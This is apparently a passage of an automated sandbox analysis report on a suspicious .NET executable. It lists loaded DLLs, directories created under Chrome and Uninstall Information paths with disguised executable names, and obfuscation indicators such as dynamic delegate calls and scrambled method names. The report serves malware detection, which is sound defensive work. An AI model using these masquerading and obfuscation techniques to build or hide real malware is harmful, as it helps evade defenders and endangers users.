                              Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: rtutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: mmdevapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: devobj.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: ksuser.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: avrt.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: audioses.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: msacm32.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: midimap.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDirectory created: C:\Program Files\Google\Chrome\Application\Idle.exeJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDirectory created: C:\Program Files\Google\Chrome\Application\6ccacd8608530fJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDirectory created: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exeJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDirectory created: C:\Program Files\Uninstall Information\c73aadd6ea7e5bJump to behavior
                              Source: 150bIjWiGH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: 150bIjWiGH.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                              Source: 150bIjWiGH.exeStatic file information: File size 3700736 > 1048576
                              Source: 150bIjWiGH.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x387000
                              Source: 150bIjWiGH.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                              Data Obfuscation

                              barindex
                              .NET source code contains method to dynamically call methods (often used by packers)
                              Source: 150bIjWiGH.exe, DmcWucu9ZjDuseHj6np.cs.Net Code: Type.GetTypeFromHandle(ynpGilbj8SbgalVBhPU.XG22aoS2MnA(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(ynpGilbj8SbgalVBhPU.XG22aoS2MnA(16777245)),Type.GetTypeFromHandle(ynpGilbj8SbgalVBhPU.XG22aoS2MnA(16777259))})
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 0_2_00007FFD9B874B9B push esi; retf 0_2_00007FFD9B874BA1
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 0_2_00007FFD9B875358 pushfd ; ret 0_2_00007FFD9B87535B
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 0_2_00007FFD9B87426C pushad ; ret 0_2_00007FFD9B87426D
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 0_2_00007FFD9B875D28 push BEFFFFFFh; retf 0_2_00007FFD9B875D2D
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 0_2_00007FFD9BC323B4 push ebx; retf 0_2_00007FFD9BC323F2
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 0_2_00007FFD9BC323B4 push esi; retf 0_2_00007FFD9BC32432
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 0_2_00007FFD9BC32374 push eax; retf 0_2_00007FFD9BC323B2
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 0_2_00007FFD9BC37379 push esp; retf 0_2_00007FFD9BC373D9
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 0_2_00007FFD9BC31F4A push ds; retf 0_2_00007FFD9BC31F8A
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 0_2_00007FFD9BC31D54 push es; retf 0_2_00007FFD9BC31D62
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 0_2_00007FFD9BC3E54C push ebx; iretd 0_2_00007FFD9BC3E55A
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 5_2_00007FFD9B884B9B push esi; retf 5_2_00007FFD9B884BA1
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 5_2_00007FFD9B885358 pushfd ; ret 5_2_00007FFD9B88535B
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 5_2_00007FFD9B88426C pushad ; ret 5_2_00007FFD9B88426D
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 5_2_00007FFD9B885D28 push BEFFFFFFh; retf 5_2_00007FFD9B885D2D
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 5_2_00007FFD9B9419F8 push eax; retf 5_2_00007FFD9B941A19
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 5_2_00007FFD9BC41829 push esp; ret 5_2_00007FFD9BC4182A
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 5_2_00007FFD9BC47379 push esp; retf 5_2_00007FFD9BC473D9
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 5_2_00007FFD9BC416EC push edx; ret 5_2_00007FFD9BC416ED
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 5_2_00007FFD9BC41685 push ebx; ret 5_2_00007FFD9BC4169A
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 5_2_00007FFD9BC415C9 push eax; ret 5_2_00007FFD9BC415DA
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 5_2_00007FFD9BC414F8 push eax; ret 5_2_00007FFD9BC4155A
                              Source: 150bIjWiGH.exe, WrEdB0Hh0mgm5vA1gfn.csHigh entropy of concatenated method names: 'P9X', 'ambHt2UtQZ', 'FEnHLOeH1Ns', 'imethod_0', 'FYLHu96oXW', 'VE5alqHehpAt58uhPSru', 'uA3Zn0HesYqpm1qDBL6x', 'DX4jMgHe0qaViE1KSIqr', 'J43DoSHecaVYgFKsMgyf', 'Cu45U0HetPm83wAebH7a'
                              Source: 150bIjWiGH.exe, THiFlrex5FivfVbfQ2s.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'cIyeaORS2m', 'Write', 'PEReUXTDVg', 'HwweNsOC7k', 'Flush', 'vl7'
                              Source: 150bIjWiGH.exe, AKuTZRp4sx2WKlvYFL0.csHigh entropy of concatenated method names: 'PeepbDH6I6', 'lAwQudHYioARjQE8ji7T', 'k4v1eOHYbpjPT7wR9mmi', 'aRNLkYHYwCEbBUb8ZNWL', 'rrwsr4HZ2piaWQPkJUQo', 'wH43QfHZO02noRJEo5Si', 'fdZijuHZHW7BcZ5A6bRx', 'e4WtAIHZxQ9NtvNfqZpZ', 'drOaU3FXAn', 'OSGKt7HZNUfgVctYGiWP'
                              Source: 150bIjWiGH.exe, X9BkVw8jYfypxoBhWxK.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'x02iWeHvFwZ0LjkQ4gDV', 'w4cKq5Hvvllp0omyoW5J', 'od9R3XHvoKSJYP9J5C3E', 'dYgwpTHvAe3H1lSBV3Ku'
                              Source: 150bIjWiGH.exe, HWVmrJe5Cdq8lABRiBy.csHigh entropy of concatenated method names: 'xoGeb4E66M', 'USyez0dw4I', 'k24eJZRrPb', 'l5Me3fOwRh', 'fKoe1CZZKB', 'kVueErv8SW', 'CCqeMdfLiW', 'E9LeDHMcbO', 'u5PemWdIbe', 'vHpe0kL6Fj'
                              Source: 150bIjWiGH.exe, TAfmZrN8w44YmFBSh3n.csHigh entropy of concatenated method names: 'H2pNl2rSXs', 'TsmNqy2suw', 'JkJRRGHfjZdtRdgKj8e4', 'Exkcg1Hfqi2ClrTDqKKS', 'cfjH6MHfg82cJ0WXYU3n', 'lZmQc4HfWTPLQlVWkkM2', 'RaHLUVHfBx3WGaVS8E04', 'jtD118HfrDsdlwfmVn9x', 'wVwBiiHf9X5eXglgRWBh', 'nywOrOHfTyZAHFbt4JtL'
                              Source: 150bIjWiGH.exe, rhgJVaU5LGTbwTxaBJ1.csHigh entropy of concatenated method names: 'kOEUtZ936x', 'brcUusuQWP', 'p6iUix1afI', 'JisCEPH7zcQma5QOYbsE', 'ONRBSbH7b64dKlbXAtay', 'B81exmH7w4WqTlujrf3B', 'IruO80HfOJT55l307kR6', 'kYWUJj89o4', 'gwLU3YXV06', 'Q7GU1GtxFe'
                              Source: 150bIjWiGH.exe, FX1ASkUFmgmNaYJr3gw.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'xuAHLR5BRnd', 'vTDHpHK1kwq', 'NH7k4HH7vRB3PCLHj18Z', 'WGr8oFH7oldcW4U2uCrS', 'KRFJpZH7A2vQOwgCy09o'
                              Source: 150bIjWiGH.exe, CIkHNUCDJFIEvgYS44O.csHigh entropy of concatenated method names: 'KDWHLr7OYks', 'FmoC0RDhYc', 'sXoHL92D7h6', 'kJEtceH5eDDco2REcYE6', 'C9rJjSH56KQHRhKyAGqX', 'qsMYcOH5IXDf1bXai3sh', 'zYoskAH5Q7wJnxMjCZmk', 'elQTHcH5SJJub3D91iEw', 'JjvMlpH5Ym9P6NQEMn4H', 'Elw82qH5ZRfSyvwuq9SB'
                              Source: 150bIjWiGH.exe, zLGDoan3hJoAVAlt9jr.csHigh entropy of concatenated method names: 'GhGHLX6rga6', 'CtmnEWJENT', 'MpVnMN1r9c', 'Q6wnD2NPma', 'yCwhJNHhXdGDubBFREwu', 'cu1XTAHh62CSocs5WdI5', 'u546SNHhIhYujNLq7cjv', 'iQlmJJHhel9GZ2liO8YF', 'DvUv2CHhQxhoNklSWtfL', 'NfaiKGHhSKZY2fonWCEP'
                              Source: 150bIjWiGH.exe, hPhnv78PegBjIQt0fmi.csHigh entropy of concatenated method names: 'VHHstuHAAyxn4qrIEHGe', 'nxVMjvHAvIZIoRp8DgH9', 'b0wVT4HAoA0YPGYudr6P', 'kAHnw0HAnaKCJwK26d6U', 'Tqdjw4GILe', 'cWj8d7HAdhixjM4T5U6Z', 'OQGmCCHAV3ZPrxeExyHZ', 'FjOr5kHA58aga4yUcPio', 'lXmj2MHAJyNNgLJ26QoU', 'T31DTmHA3bUoWbDIkRvE'
                              Source: 150bIjWiGH.exe, i76fD4JSoQgA41G4eD.csHigh entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'Psd1kO4U3'
                              Source: 150bIjWiGH.exe, UH8Njf2Zcu37XU2VCp7.csHigh entropy of concatenated method names: 'kVw25WBRrD', 'zvh2d4fZGm', 'xdvTY5HQ73qxGKQ7VHd5', 'fwDUpYHQYI6Wd5pto0rT', 'lvUbOsHQZgxP20CI0xfR', 'WEf2ECTQtg', 'PGiSc6HQoqT84b4ueUXL', 'rw4N2wHQF2rKlW0l3k6S', 'I7mk3nHQvV948cY7oQ8m', 'gZFFZGHQAHWlXsLPvqd6'
                              Source: 150bIjWiGH.exe, NTC0pttg1HTIU4MADSr.csHigh entropy of concatenated method names: 'g7FtBe29N1', 'RGZty8Lga7', 'P8jtK4VopL', 'z2xtG8RrKO', 'AHWtPTs1gj', 'DUJtX6ebtS', 'gF8t6hoVoE', 'U22tI7Icyx', 'Dispose', 'A4DQM1HilpXNhT4hu5Q1'
                              Source: 150bIjWiGH.exe, OoXUWjFAigHsfr4KHOT.csHigh entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'qEUF4pLrkN', 'n2oFViATUy', 'a3jF5BdNrD', 's6lFd4KrvL', 'miVFJ1j3kD', 'QtpF3MVbVT', 'IjXulRH05kd6OdFBCPNl'
                              Source: 150bIjWiGH.exe, j2DDjw4Z2yOo2LE8QoW.csHigh entropy of concatenated method names: 'OLO4fb5vFI', 'lSi4FVpZlQ', 'JRM4vKYPNk', 'beS4oCA0k2', 'g5t4AbEufQ', 'EUa4nhBqFd', 'V4i44uMK1J', 'eEX4VE7CcS', 'i0045ZfFv9', 'jQh4d0hx5m'
                              Source: 150bIjWiGH.exe, MQd9yfP0Vqn0hVB1n6F.csHigh entropy of concatenated method names: 'HbXPhwnLAy', 'L35PsG7PLg', 'SW8PtpHUiZ', 'qgqPuilW3A', 'O6pPinXeDM', 'AedOo4HJ5O6hAWklxH3m', 'J35UtyHJ4ft4qNv6jjLN', 'CxBd8uHJVZbW7X58UEJB', 'xedAhTHJdpMOVmDLvNED', 'HhhZtZHJJfNtGR80RY6C'
                              Source: 150bIjWiGH.exe, VG5T9Va4AuW3xal8oFH.csHigh entropy of concatenated method names: 'q64', 'P9X', 'rUIHpjWPj25', 'vmethod_0', 'vOIHLUwjAT7', 'imethod_0', 'BiO6ROHZ3D3nHC8aJaRf', 'jZuSJaHZ1o5GStwyTTO4', 'zX4FWVHZEg9RXlTYqw0w', 'cSf1EjHZM4pcpWwIKOBQ'
                              Source: 150bIjWiGH.exe, rrp7LICnCChcdkPPfCl.csHigh entropy of concatenated method names: 'N2N', 'MBSHLWOmN8Y', 'xAoCVApSNv', 'aweHLBPb43n', 'tAaT03H5WKl8LfhMWuuo', 'vgGFLeH5Bw5FSNTvWakv', 'JWgQEwH5gXIJy72ntPQq', 'cbscQ5H5jSkm956jSBWX', 'rEAaKlH5roeoAAS83HJi', 'vaSfakH59QnJT092RyIM'
                              Source: 150bIjWiGH.exe, a7bpikNgn4Nbf8Mg26Q.csHigh entropy of concatenated method names: 'P9X', 'nfRHpGVTK9M', 'vmethod_0', 'imethod_0', 'PGZxWeHfGdujLNOKSDq3', 'SuApa9Hfkkk0f3v6Nlqq', 'tNojCBHfK5Y7sTZX0LlA', 'EtksnwHfPJH6IrwAwPWr', 'So2NxYHfX5ORWY5M7wlx', 'Q5ZtIlHf6ny42tu5cAJt'
                              Source: 150bIjWiGH.exe, OCqjyLL15C4FV1MGkXe.csHigh entropy of concatenated method names: 'x1BLt8y3D9', 'eFOjjLHv84huHRJYuekl', 'QwxwfYHvRyoq5a15QQcg', 'n4YsgrHvlRbCDfJ2kSyJ', 'MepaNQHvqx6quDFO8DWN', 'P9X', 'vmethod_0', 'QR8HpekUjrR', 'imethod_0', 'QQEaBUHvN1PGDxq12W1L'
                              Source: 150bIjWiGH.exe, vfsct6p63j9aKc4jDs8.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'UxLHLxvSTDa', 'vTDHpHK1kwq', 'CPrF4lHYyTIXlWN6QC71', 'WMuBJxHYCFUUQvv5KS0c', 'zI3QILHYkH3CN3m4MAGk'
                              Source: 150bIjWiGH.exe, rHNSY6LrEFiBsDXdG6M.csHigh entropy of concatenated method names: 'CLRLCqNDni', 'xN0dkIHFvRSZIUZ4nPwr', 'SeKB1kHFf3qWoVLo6Qen', 'cS2hriHFFOhZZqZimbgX', 'vTcSF0HFo7otJop9DLR5', 'GtlLTb3SHh', 'VSsOgwHFQjPMJgQ7A8ju', 'hjJpWUHFSdoLUXTWpmHE', 'luUoILHFYcIqSuqoq9Ex', 'MM5P4SHFITnISA0toPuy'
                              Source: 150bIjWiGH.exe, QZjQAHHIWZrHZg7HbA2.csHigh entropy of concatenated method names: 'Co7', 'd2B', 'hGPHQtJVo0', 'LugU7BHeY3NVO9onAuly', 'RagXfZHeQNUIiTXsaWmR', 'n3YMwuHeS5wVPjQ8DKfp', 'Vc7iXAHeZdB6OsrhqK55'
                              Source: 150bIjWiGH.exe, luFxxouOH7bhXISKGqP.csHigh entropy of concatenated method names: 'zrfupTdJUi', 'CKsuac6C8N', 'IAxss1Hi1CvBSyn931rs', 'SCdBckHiEUvC6rrMhIU9', 'CRmxjiHiM9SskcluZhh0', 'gHMSZBHiDYDjmLANIrPC', 'M8dBRgHimLkVEfTehLkF', 'QBhu2onSPi', 'Ei6MARHi5AnhPG9cQ2qe', 'XTeOE7HidwvAKpVJ7ptp'
                              Source: 150bIjWiGH.exe, L6outxhIpKyrDwnFJAa.csHigh entropy of concatenated method names: 'lrQHL6Cb3BX', 'CJMHUkO9Qgq', 'yQ8', 'K9m', 'nOr32cHtvYMdjteiKiyp', 'Pl15BGHtfsCqcfN7s8WZ', 'AwvQcTHtFJ7w7gN0a50b', 'QIJtrSHtoNgGVdlH8bNV'
                              Source: 150bIjWiGH.exe, YCf6gg2aqBfu5yuM2Wg.csHigh entropy of concatenated method names: 'Fw72NLFrmp', 'Pgq2LpL45k', 'KJ028WaqKX', 'OF12RVtaEW', 'YPDCZeHQRKiZWPKbKoBI', 'QUV1vPHQLQMSN2jPtiAu', 'kLM1uXHQ8BBibnf0cHYT', 'vvQlqMHQlLtePqgDkB6x', 'P82i3eHQqAuc3CLIdGVB', 'BB6NZYHQgGybcyrnSDQx'
                              Source: 150bIjWiGH.exe, fAIFZLWlSJKNXGw9YVs.csHigh entropy of concatenated method names: 'Dispose', 'LPmWgkKJEU', 'NSiWjnHatB', 'wIxWW7Nx8b', 'fAe9L9HAzcLfF24ltKZG', 'vGSAYdHnOBv12VAFAPtA', 'zlxg9UHnHE25UuCu9y2a', 'cQbgn1Hn2lFy2Bwb6HEU', 'Dcm6a6HnxXfiWIthgSRE', 'a2HAfWHnp7FHe4RTmNaA'
                              Source: 150bIjWiGH.exe, Sd7wP97kJrXCDUD7TlA.csHigh entropy of concatenated method names: 'O9hfj2yxMg', 'SvjSokHm3DTO1ZgPbdK9', 'u8Gkp5Hmdkj3efjSabUx', 'xRaa4mHmJt6GewIkgvuj', 'WBfQBEHm1b7IXfdYtbEg', 'kt5', 'XKy7GuAikI', 'ReadByte', 'get_CanRead', 'get_CanSeek'
                              Source: 150bIjWiGH.exe, CxppKd82fbVVXGf7SSj.csHigh entropy of concatenated method names: 'UUC8pYYNSi', 'JA08ac2Us8', 'Luq8Ugf0Cs', 'kjY8NChZA9', 'wHW8L8A6FS', 'YA688tc7oG', 'S7g8RFXurq', 'nKt8lirtTC', 'P7V8qsqOAu', 'Pyg8gk5k3q'
                              Source: 150bIjWiGH.exe, kb5TGGyhLi4cShaNPDw.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'BnRHLg7TqlA', 'MKvHp1Ela91', 'PGVxXlHVKqbDFAccfiJQ', 'GKSLIaHVGuL5WCbLyBLG', 'C7TsQhHVPt8wGdqpyHXM', 'SUb7U1HVXgIEiBjkNSIR', 'DijIniHV6Yh9uu4Kawp8'
                              Source: 150bIjWiGH.exe, MQj1Y4tZQkf5RS7q5al.csHigh entropy of concatenated method names: 'fGLtfQWEyR', 'TWytFSUIFW', 'KEOtv1Hos0', 'nUjtoc6uNf', 'Dispose', 'NqyeWeHirkZGPunHuKZx', 'AwwfBJHi9UOH9Dc3e4Pg', 'Ld1rNJHiTvuLwi8c20uX', 'wuLfFKHiykmUMYwbIjGf', 'z059GiHiCasHxKO6EvDV'
                              Source: 150bIjWiGH.exe, YMqXwbn8pdY2u3Prlq1.csHigh entropy of concatenated method names: 'rbenXjZTLa', 'sLrperHhgdOgOrNSq1cJ', 'QvOvxxHhl2HvK552EeP2', 'arUijwHhqQNa9k5nBt1M', 'KIoXI7Hhjp9Sd3gbMCxB', 'HesChHHhWdWG719MaIA0', 'IPy', 'method_0', 'method_1', 'method_2'
                              Source: 150bIjWiGH.exe, jjVKU4Qw3bDwwV7jJhX.csHigh entropy of concatenated method names: 'QWBSOQl7p6', 'TD2SHOuTTg', 'gSuS2pL5RJ', 'qS6Sx118FC', 'qwaSpVjj4q', 'Cd8SayUh8g', 'PpBeI4HE313w1vCNZdU4', 'ER4439HEdCN0H1id6uXM', 'JrAMG5HEJ6MWjc81KZnt', 'eI1bXxHE1J0kX0HU9aJn'
                              Source: 150bIjWiGH.exe, Ef2AOyCjCFD34WWvJG9.csHigh entropy of concatenated method names: 'ci2CCw2Tpa', 'PWZm87HVhJPP6XLYEuOa', 'VaTHyRHVsWqy2w69Y8mv', 't1lgLRHV0JnKQfV7J7BS', 'ClpIbiHVcMmUjyiK7iQU', 'WKNydXHVtKGLeqeVfRVZ', 'GSGCBJhfcU', 'fr2M4jHVE6sWrIhOY9vm', 'fIY5v9HV3rMARSBlmPCJ', 'FgFTEnHV1mMwcI40rxOu'
                              Source: 150bIjWiGH.exe, N7i0OyUXuB4Cu3kEAk4.csHigh entropy of concatenated method names: 'MUtUZLbc9D', 'JY3Tg9H7fejRJq5FM0Yu', 'RAsBsXH7Z1W97Ce7RU2X', 'LcKrerH77BddvvtSvhJI', 'E94', 'P9X', 'vmethod_0', 'L41HpCrKcnF', 'kD6HL8KmJD5', 'imethod_0'
                              Source: 150bIjWiGH.exe, r1rL5kbTn3F82TuxB81.csHigh entropy of concatenated method names: 'gDQbSVgg4L', 'rZubYWvxTp', 'u7AbZlyjJB', 'T3Db7f0kWU', 'WWbbfhWSVK', 'GiibFQkAcp', 'ECJbvAVMDX', 'sW2bo4sNBj', 'RShbAL0l8Z', 's2mbnH4fWt'
                              Source: 150bIjWiGH.exe, tHsdWQa8DdENaUjHo25.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'VZFHLaLJuXR', 'vTDHpHK1kwq', 'uYkhK5HZlVQd9XKMrhdj', 'MFQjf3HZqT3pYVPTMi4f', 'vFCdG1HZgARlSwDeIZyQ', 'ClBYqkHZjq8T0JEBY7hK'
                              Source: 150bIjWiGH.exe, UyiZJVSZPQKpxb1iEE6.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                              Source: 150bIjWiGH.exe, m89FWlKgqYTtySSY3wX.csHigh entropy of concatenated method names: 'yXjPH2VV7j', 's5psRMHJCe6TDQLt6n0V', 'dkiYNwHJTNqOKoiVCCNK', 'QRGCP3HJyN6NRuHfIJm0', 'YPU3CwHJkKeGDPMPsXRJ', 'dubKWVlW32', 'vYWKBHZLl9', 'VwLKrmZe61', 'drAK9QcqGs', 'CyVKTx18Q2'
                              Source: 150bIjWiGH.exe, XEYIAVfmyukLPf2hfMN.csHigh entropy of concatenated method names: 'stUfc8UrVD', 'k6r', 'ueK', 'QH3', 'y3pfhAZIVc', 'Flush', 'yOCfsJrH29', 'k0yfthGPFa', 'Write', 'qxrfuYBWsi'
                              Source: 150bIjWiGH.exe, yro7gXaBYDHX29h0VYW.csHigh entropy of concatenated method names: 'qc7aeopRZC', 'DSsaQu6GcU', 'NNnaSYTO32', 'z7uoEyHZFs5dpYLXUQgy', 'eihpngHZvQOAHpnAgZyM', 'tPeXfqHZ7kjC7C1fV96E', 'WhfH5EHZfe3KeC9QMNeY', 'sQIaPSjImZ', 'cxgaXfImpW', 'YvNjmAHZSEw8npaXwf1U'
                              Source: 150bIjWiGH.exe, wVJdFuYwN8WsM28SGx7.csHigh entropy of concatenated method names: 'nykZOJKM4l', 'qZJZHmIR50', 'Yd7', 'qXbZ2k6NCj', 'if5Zx3DFTI', 'uW2ZpG09g1', 'q1lZaEya1V', 'BfcRE1HD0fGGgZpj11Bg', 's8g4TSHDDUD2wZyoYrOY', 'cnNOr1HDmPEHMY1oRopq'
                              Source: 150bIjWiGH.exe, hYBLI52mxbyWG0Fkc2U.csHigh entropy of concatenated method names: 'uJAxNemH0W', 'JZEvZfHQcGUcET6dlgg3', 'aExosfHQhAU8aMiE7Ecp', 'IfrdDlHQs8rQsqBveZIg', 'BoQA80HQmWCn5iLOI96A', 'lpayHHHQ0GyNaXTwINxH', 'gI9R6JHQtVi126w4PdAr', 'cWTxO1FTIs', 'W0Nx2wjlnN', 'xepxxuKtUx'
                              Source: 150bIjWiGH.exe, KegdKZPRnHmlN2Y8dwK.csHigh entropy of concatenated method names: 'MoQPZZWkUJ', 'AyNPq2Y9aq', 'mMHPgXEMrG', 'O02Pj7HGsP', 'C5yPWGchQk', 'CpvPBsIfUH', 'Bx3PrL1yBq', 'N8rP9LkKgI', 'alyPTlL4Um', 'SrjPyCmNDZ'
                              Source: 150bIjWiGH.exe, NCqEMFZL7ttKE6n1Uki.csHigh entropy of concatenated method names: 'l9gZRAoRxf', 'gfvZluhIJG', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'hm3Zq2W4o8', 'method_2', 'uc7'
                              Source: 150bIjWiGH.exe, C7aSrlSVN3Omp1Amp6c.csHigh entropy of concatenated method names: 'HKVSdLJn0a', 't9wSJ9mLJs', 'WwXS3ocIro', 'XMUS1ouS6n', 'k11SEW5Acw', 'r0ISMyNlnN', 'i2NSDEM7GO', 'ftVSm5jVPw', 'h0rS0e2fCH', 'z4BScNbUu7'
                              Source: 150bIjWiGH.exe, Qix8payQA0jPRrO1Y8p.csHigh entropy of concatenated method names: 'KDOyouqBf3', 'EDOfF7HVafdwsbPNYeKn', 'VQo5dqHVx8Twf04mmbya', 'XDG6KHHVprN9iROpacl6', 'HE5XS5HVU9TihJsOkwSk', 'PQsyY9EyhO', 'TjIyZyKAeC', 'BGSy7cTyyt', 'LK5jibHVOMfVRuwWv6YP', 'PpSCZQH4wVZGUxAvIahu'
                              Source: 150bIjWiGH.exe, BIRNaXa0pyS2JCWQFit.csHigh entropy of concatenated method names: 'dDtaiIClkt', 'g6WabSas2X', 'Smjawc1Whw', 'H5oazOtsUF', 'qlNUONwePu', 'mvRUHRvwDZ', 'TnWU2w6XNB', 'i7U33xH78ODqr8nZ1CQF', 'Ut5OvcH7N7Ve8nwIq4wf', 'Ld3mk0H7LcY5Nkh9ZIe1'
